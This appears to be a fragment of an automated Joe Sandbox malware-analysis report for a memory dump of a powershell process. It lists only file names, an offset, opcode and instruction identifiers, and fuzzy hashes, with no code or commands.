                                                                                          • Source File: 0000000C.00000002.2823270461.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_7ffe16710000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 19a2d29e01c69937370cffdb14be1d80b3851fe12b2816b6a43b2b21fda91370
                                                                                          • Instruction ID: eb5011826f21b6a0b460e23e23f5b1551e39d8bdea3837a262f5910665fac353
                                                                                          • Opcode Fuzzy Hash: 19a2d29e01c69937370cffdb14be1d80b3851fe12b2816b6a43b2b21fda91370
                                                                                          • Instruction Fuzzy Hash: 07F0A033D0DAD84FEB62E768581A1DCFBF0EF19234B1801FFC448D61A2DA2968498740